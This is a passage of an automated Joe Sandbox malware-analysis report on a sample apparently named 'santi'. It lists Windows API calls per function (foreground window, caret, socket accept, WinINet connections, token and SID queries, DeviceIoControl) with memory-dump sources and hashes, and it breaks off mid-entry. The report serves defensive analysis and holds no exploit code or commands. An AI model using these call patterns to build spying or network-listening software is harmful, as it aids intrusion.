                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                • String ID:
                                                                • API String ID: 3058430110-0
                                                                • Opcode ID: e536b6683f20296eec73deac144b7101e538534eb1e7d80b660fccefdfc8a912
                                                                • Instruction ID: 80bbedcd358f76605dabaff95b0eee25956db6324dd61bd3a0acb4b81f8d6499
                                                                • Opcode Fuzzy Hash: e536b6683f20296eec73deac144b7101e538534eb1e7d80b660fccefdfc8a912
                                                                • Instruction Fuzzy Hash: C231B231600206AFDB2B9F76CC44BEABBA9BF4D310F168428E6659B190E731D8D1D790
                                                                APIs
                                                                • GetForegroundWindow.USER32 ref: 00347CB9
                                                                  • Part of subcall function 00325F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00325F6F
                                                                  • Part of subcall function 00325F55: GetCurrentThreadId.KERNEL32 ref: 00325F76
                                                                  • Part of subcall function 00325F55: AttachThreadInput.USER32(00000000,?,0032781F), ref: 00325F7D
                                                                • GetCaretPos.USER32(?), ref: 00347CCA
                                                                • ClientToScreen.USER32(00000000,?), ref: 00347D03
                                                                • GetForegroundWindow.USER32 ref: 00347D09
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                • String ID:
                                                                • API String ID: 2759813231-0
                                                                • Opcode ID: 8b79496bb94223d1a617cf395462239b50f9cc8306522aa87e57c27a70580f02
                                                                • Instruction ID: 07445636840223f178a4123ce7dd2bfd1b80f5027484f930a5bc03032d238a66
                                                                • Opcode Fuzzy Hash: 8b79496bb94223d1a617cf395462239b50f9cc8306522aa87e57c27a70580f02
                                                                • Instruction Fuzzy Hash: 80313E71D00108AFDB01EFA5D8819EFFBFDEF55310B11846AE915E7211DA30AE058FA0
                                                                APIs
                                                                  • Part of subcall function 002FB34E: GetWindowLongW.USER32(?,000000EB), ref: 002FB35F
                                                                • GetCursorPos.USER32(?), ref: 0034F211
                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0035E4C0,?,?,?,?,?), ref: 0034F226
                                                                • GetCursorPos.USER32(?), ref: 0034F270
                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0035E4C0,?,?,?), ref: 0034F2A6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                • String ID:
                                                                • API String ID: 2864067406-0
                                                                • Opcode ID: 22cc211a263c984c57ce19afe259a703eafc676efc07e1daeab333d580eff9cd
                                                                • Instruction ID: 002d9e0626095e483d00f9478fd318e47bc553db014d44ebe7d9448107059c33
                                                                • Opcode Fuzzy Hash: 22cc211a263c984c57ce19afe259a703eafc676efc07e1daeab333d580eff9cd
                                                                • Instruction Fuzzy Hash: 6E21823D600018AFCB178F54C858DFA7BB9EF4A750F098465F9058B1A1D3B4A951DF50
                                                                APIs
                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00334358
                                                                  • Part of subcall function 003343E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00334401
                                                                  • Part of subcall function 003343E2: InternetCloseHandle.WININET(00000000), ref: 0033449E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                • String ID:
                                                                • API String ID: 1463438336-0
                                                                • Opcode ID: bea0710a2e84522c22d59f359b6997bb782f0c5422051e3842a06aa095b845c2
                                                                • Instruction ID: 7ae99ae1d5d3eb638eadac63e5875fb3b600f92ece9ee2304248ddaf291d9407
                                                                • Opcode Fuzzy Hash: bea0710a2e84522c22d59f359b6997bb782f0c5422051e3842a06aa095b845c2
                                                                • Instruction Fuzzy Hash: 0521D439604601BBDB179F609C80F7BB7ADFF44720F00801AFA1597550D771A8309B90
                                                                APIs
                                                                • GetWindowLongW.USER32(?,000000EC), ref: 00348AA6
                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00348AC0
                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00348ACE
                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00348ADC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Window$Long$AttributesLayered
                                                                • String ID:
                                                                • API String ID: 2169480361-0
                                                                • Opcode ID: 04b736cdaf51ed756dfa2101067af2e32f3f4a9b0534e9b52e2d65cadb5003bc
                                                                • Instruction ID: 4b08b93affe709714fb4f1c67b1eeaf8a49e86af8b6c6d714fd58b9c3c3c4889
                                                                • Opcode Fuzzy Hash: 04b736cdaf51ed756dfa2101067af2e32f3f4a9b0534e9b52e2d65cadb5003bc
                                                                • Instruction Fuzzy Hash: 8E119A31795110ABE706AB29DC05FBE779DAF85320F15811AF916CB2E2CFB0BC108B90
                                                                APIs
                                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00338AE0
                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00338AF2
                                                                • accept.WSOCK32(00000000,00000000,00000000), ref: 00338AFF
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00338B16
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastacceptselect
                                                                • String ID:
                                                                • API String ID: 385091864-0
                                                                • Opcode ID: 18cf28c7cbd237da23c1ddfe6f1d94537a9fff6eb796dedc437ce5ef55367a52
                                                                • Instruction ID: 4ca47a93f5b0c421c9a4284e461f1efc0712fa4f1b5212cb5d7dcfb8ca3f59a7
                                                                • Opcode Fuzzy Hash: 18cf28c7cbd237da23c1ddfe6f1d94537a9fff6eb796dedc437ce5ef55367a52
                                                                • Instruction Fuzzy Hash: 7721D572A001249FC7219F69CC84A9EBBFCEF4A350F01816AF849D7290DBB4DA408F90
                                                                APIs
                                                                  • Part of subcall function 00321E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00320ABB,?,?,?,0032187A,00000000,000000EF,00000119,?,?), ref: 00321E77
                                                                  • Part of subcall function 00321E68: lstrcpyW.KERNEL32(00000000,?,?,00320ABB,?,?,?,0032187A,00000000,000000EF,00000119,?,?,00000000), ref: 00321E9D
                                                                  • Part of subcall function 00321E68: lstrcmpiW.KERNEL32(00000000,?,00320ABB,?,?,?,0032187A,00000000,000000EF,00000119,?,?), ref: 00321ECE
                                                                • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0032187A,00000000,000000EF,00000119,?,?,00000000), ref: 00320AD4
                                                                • lstrcpyW.KERNEL32(00000000,?,?,0032187A,00000000,000000EF,00000119,?,?,00000000), ref: 00320AFA
                                                                • lstrcmpiW.KERNEL32(00000002,cdecl,?,0032187A,00000000,000000EF,00000119,?,?,00000000), ref: 00320B2E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: lstrcmpilstrcpylstrlen
                                                                • String ID: cdecl
                                                                • API String ID: 4031866154-3896280584
                                                                • Opcode ID: 4236acf2ee537c4053f714929bf7da188fa80a8e6d94c62ec0d7817d86f84ee9
                                                                • Instruction ID: fbb7c9f3137497050805d0f6112ead748ad97a89028ac4b33104ece2230c5b62
                                                                • Opcode Fuzzy Hash: 4236acf2ee537c4053f714929bf7da188fa80a8e6d94c62ec0d7817d86f84ee9
                                                                • Instruction Fuzzy Hash: 97119636210315AFDB269F74EC45D7A77A8FF49354F81406AE906CB251EBB1D850C7A0
                                                                APIs
                                                                • _free.LIBCMT ref: 00312FB5
                                                                  • Part of subcall function 0030395C: __FF_MSGBANNER.LIBCMT ref: 00303973
                                                                  • Part of subcall function 0030395C: __NMSG_WRITE.LIBCMT ref: 0030397A
                                                                  • Part of subcall function 0030395C: RtlAllocateHeap.NTDLL(00DD0000,00000000,00000001,00000001,00000000,?,?,002FF507,?,0000000E), ref: 0030399F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: AllocateHeap_free
                                                                • String ID:
                                                                • API String ID: 614378929-0
                                                                • Opcode ID: 430077320499f5baa456cb4bc4bd7a0224d2a736501022dbc9538980c6dea396
                                                                • Instruction ID: 43d9db153ccf5826d45860ae9bf602b635337339b4de60f09a866d2f1bf903bf
                                                                • Opcode Fuzzy Hash: 430077320499f5baa456cb4bc4bd7a0224d2a736501022dbc9538980c6dea396
                                                                • Instruction Fuzzy Hash: 5311CD3190A2159BDB3B7F70AC156DA3BDCAF0C360F214919F8499E1A1DB70C9919691
                                                                APIs
                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 003205AC
                                                                • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 003205C7
                                                                • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 003205DD
                                                                • FreeLibrary.KERNEL32(?), ref: 00320632
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                • String ID:
                                                                • API String ID: 3137044355-0
                                                                • Opcode ID: f3e900302ed09459569e99dd333e01aef9cbe5adf627aab37eb2422046e57ab9
                                                                • Instruction ID: 5f14ad7763d722fd2be0f6f64e038b8fb7e0183b67db3bf7c119bd1d22aabb83
                                                                • Opcode Fuzzy Hash: f3e900302ed09459569e99dd333e01aef9cbe5adf627aab37eb2422046e57ab9
                                                                • Instruction Fuzzy Hash: 9021D071A00228EFDB26CF91FC88ADABBBCEF40700F00846DE51696011DBB5EA58DF50
                                                                APIs
                                                                • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00326733
                                                                • _memset.LIBCMT ref: 00326754
                                                                • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 003267A6
                                                                • CloseHandle.KERNEL32(00000000), ref: 003267AF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                • String ID:
                                                                • API String ID: 1157408455-0
                                                                • Opcode ID: 793eb257ac3664b41fd620cf947f74d3900571231b06b48abbc109a0ea8bef12
                                                                • Instruction ID: 85b563fbf946432d96ecad98db6804a7509975a136f18d8308035ae53ed52156
                                                                • Opcode Fuzzy Hash: 793eb257ac3664b41fd620cf947f74d3900571231b06b48abbc109a0ea8bef12
                                                                • Instruction Fuzzy Hash: AC110A75D012287AE72157A9BC4DFABBBBCEF44724F10419AF504E71C0D2744E808B74
                                                                APIs
                                                                  • Part of subcall function 0031AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0031AA79
                                                                  • Part of subcall function 0031AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0031AA83
                                                                  • Part of subcall function 0031AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0031AA92
                                                                  • Part of subcall function 0031AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0031AA99
                                                                  • Part of subcall function 0031AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0031AAAF
                                                                • GetLengthSid.ADVAPI32(?,00000000,0031ADE4,?,?), ref: 0031B21B
                                                                • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0031B227
                                                                • HeapAlloc.KERNEL32(00000000), ref: 0031B22E
                                                                • CopySid.ADVAPI32(?,00000000,?), ref: 0031B247
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                • String ID:
                                                                • API String ID: 4217664535-0
                                                                • Opcode ID: 2f796d80418c594c6c09a2855ba4339aea62dbe270a61140b7e177072ee9f6c6
                                                                • Instruction ID: 8b28d8a32e5f2f06d3ece76b311b32332046f21f9268282d445c13683f7e8c74
                                                                • Opcode Fuzzy Hash: 2f796d80418c594c6c09a2855ba4339aea62dbe270a61140b7e177072ee9f6c6
                                                                • Instruction Fuzzy Hash: 77119E71A00205FFDB0A9F98DD85AEEB7BDEF89304F15842DE94297210D771AE89CB10
                                                                APIs
                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 0031B498
                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0031B4AA
                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0031B4C0
                                                                • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0031B4DB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: MessageSend
                                                                • String ID:
                                                                • API String ID: 3850602802-0
                                                                • Opcode ID: d79de8c08a01d751ef3d2a92d859614d64c60eed9bd91afaf969e1cbf7a370c7
                                                                • Instruction ID: 7b530c19a3ec34c991dc4cc3e45b960ec87e544e45a7e9a935b0a9a5cb86525a
                                                                • Opcode Fuzzy Hash: d79de8c08a01d751ef3d2a92d859614d64c60eed9bd91afaf969e1cbf7a370c7
                                                                • Instruction Fuzzy Hash: 1A11487A900218FFDB11DFA9C885EDDBBB8FB08700F208091E604B7290DB71AE50DB94
                                                                APIs
                                                                  • Part of subcall function 002FB34E: GetWindowLongW.USER32(?,000000EB), ref: 002FB35F
                                                                • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 002FB5A5
                                                                • GetClientRect.USER32(?,?), ref: 0035E69A
                                                                • GetCursorPos.USER32(?), ref: 0035E6A4
                                                                • ScreenToClient.USER32(?,?), ref: 0035E6AF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: Client$CursorLongProcRectScreenWindow
                                                                • String ID:
                                                                • API String ID: 4127811313-0
                                                                • Opcode ID: 8970963423bb3cb2c3da6a6257dc1c91b7662b9fd2aee1b9941ba64f0fb5945b
                                                                • Instruction ID: 51995453af6d451f36d59ef20a7a8745cf38a6450fcac95a943e538a5f7bccf3
                                                                • Opcode Fuzzy Hash: 8970963423bb3cb2c3da6a6257dc1c91b7662b9fd2aee1b9941ba64f0fb5945b
                                                                • Instruction Fuzzy Hash: 47113631A10029BBCF16DF98CC558BEBBB8EB09345F404461EA42E7150D7B4AAA5CBA1
                                                                APIs
                                                                • GetCurrentThreadId.KERNEL32 ref: 00327352
                                                                • MessageBoxW.USER32(?,?,?,?), ref: 00327385
                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0032739B
                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003273A2
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                • String ID:
                                                                • API String ID: 2880819207-0
                                                                • Opcode ID: fb15c3e1ec03adc82b6bfe6c0aed54536dbb86c94d3d84fc9f73eb9666a263dd
                                                                • Instruction ID: 3225e6adacc7bcba76edbfb5afb0ff717c389fa03ca4edaf5b5702ff5a49e4d8
                                                                • Opcode Fuzzy Hash: fb15c3e1ec03adc82b6bfe6c0aed54536dbb86c94d3d84fc9f73eb9666a263dd
                                                                • Instruction Fuzzy Hash: AB11C476A04214AFC703DBACEC09BDE7BADAB4A310F144355F925D32A1D7B08D149BB1
                                                                APIs
                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 002FD1BA
                                                                • GetStockObject.GDI32(00000011), ref: 002FD1CE
                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 002FD1D8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: CreateMessageObjectSendStockWindow
                                                                • String ID:
                                                                • API String ID: 3970641297-0
                                                                • Opcode ID: d16a34141a004aa9fe7133c36156a471e102d7c7bb4fb519901f08a855020120
                                                                • Instruction ID: 58b025271d8efbc226fb267e231190c7534ec1eba2590d2c47cca7d901bbc1bc
                                                                • Opcode Fuzzy Hash: d16a34141a004aa9fe7133c36156a471e102d7c7bb4fb519901f08a855020120
                                                                • Instruction Fuzzy Hash: AE118E7251150DBFEB024FA0DC54EEBBB6EFF093A4F044121FA0952060C7B1DD609BA0
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                • String ID:
                                                                • API String ID: 3016257755-0
                                                                • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                • Instruction ID: 15bd471d1672cc8a59a5529a48b0e95d538dfd4818d2dbd0041d2a46470264a8
                                                                • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                • Instruction Fuzzy Hash: 9101483600014AFBCF1B5F88DC028EE3F27BB1C351B598555FA2899031D336CAB2AB91
                                                                APIs
                                                                  • Part of subcall function 00307A0D: __getptd_noexit.LIBCMT ref: 00307A0E
                                                                • __lock.LIBCMT ref: 0030748F
                                                                • InterlockedDecrement.KERNEL32(?), ref: 003074AC
                                                                • _free.LIBCMT ref: 003074BF
                                                                • InterlockedIncrement.KERNEL32(00DE27E0), ref: 003074D7
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1293484299.00000000002E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002E0000, based on PE: true
                                                                 • Associated: 00000000.00000002.1293469497.00000000002E0000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000036D000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293535624.000000000038E000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293580963.000000000039A000.00000004.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.1293597824.00000000003A4000.00000002.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2e0000_santi.jbxd
                                                                Similarity
